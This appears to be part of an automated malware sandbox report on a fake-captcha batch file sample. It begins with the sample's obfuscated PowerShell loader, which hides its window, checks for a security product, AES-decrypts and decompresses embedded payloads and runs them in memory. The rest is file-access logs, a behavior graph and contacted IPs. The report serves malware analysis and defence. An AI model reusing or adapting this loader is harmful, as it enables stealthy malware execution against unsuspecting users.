''),'siszbpliszbiiszbtiszb'.replace('iszb', ''),'deayoncomayonprayonessayon'.replace('ayon', '');powershell -w hidden;$modules=[system.diagnostics.process]::($kkoh[0])().modules;if ($modules -match 'hmpalert.dll') { exit; };function rubtz($wsnje){$afysz=[system.security.cryptography.aes]::create();$afysz.mode=[system.security.cryptography.ciphermode]::cbc;$afysz.padding=[system.security.cryptography.paddingmode]::pkcs7;$afysz.key=[system.convert]::($kkoh[11])('sinwep/fk7rgqol4+myngailposrns1a+htyg2gc1lk=');$afysz.iv=[system.convert]::($kkoh[11])('yzogdg/vbgileun/jpga4q==');$fqbge=$afysz.($kkoh[8])();$auohi=$fqbge.($kkoh[1])($wsnje,0,$wsnje.length);$fqbge.dispose();$afysz.dispose();$auohi;}function lyexu($wsnje){$psbxz=new-object system.io.memorystream(,$wsnje);$qjwps=new-object system.io.memorystream;$kucrl=new-object system.io.compression.gzipstream($psbxz,[io.compression.compressionmode]::($kkoh[13]));$kucrl.($kkoh[9])($qjwps);$kucrl.dispose();$psbxz.dispose();$qjwps.dispose();$qjwps.toarray();}$cnxbi=[system.io.file]::($kkoh[5])([console]::title);$gbxfr=lyexu (rubtz ([convert]::($kkoh[11])([system.linq.enumerable]::($kkoh[3])($cnxbi, 5).substring(2))));$hwatp=lyexu (rubtz ([convert]::($kkoh[11])([system.linq.enumerable]::($kkoh[3])($cnxbi, 6).substring(2))));[system.reflection.assembly]::($kkoh[7])([byte[]]$hwatp).($kkoh[4]).($kkoh[10])($null,$null);[system.reflection.assembly]::($kkoh[7])([byte[]]$gbxfr).($kkoh[4]).($kkoh[10])($null,$null); " Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1520617 Sample: Captcha_V4ID882994ft.bat Startdate: 27/09/2024 Architecture: WINDOWS Score: 56 23 tse1.mm.bing.net 2->23 25 ax-0001.ax-msedge.net 2->25 31 Multi AV Scanner detection for submitted file 2->31 33 AI detected suspicious sample 2->33 8 cmd.exe 1 2->8         started        10 svchost.exe 1 1 2->10         started        signatures3 process4 dnsIp5 13 powershell.exe 16 8->13         started        17 conhost.exe 8->17         started        19 cmd.exe 1 8->19         started        27 127.0.0.1 unknown unknown 10->27 process6 dnsIp7 29 185.91.69.119, 49731, 49742, 49747 ONO-ASCableuropa-ONOES Spain 13->29 35 Suspicious powershell command line found 13->35 21 powershell.exe 8 13->21         started        signatures8 process9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.91.69.119
 unknown Spain
6739 ONO-ASCableuropa-ONOES false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
ax-0001.ax-msedge.net 150.171.27.10 true
tse1.mm.bing.net unknown unknown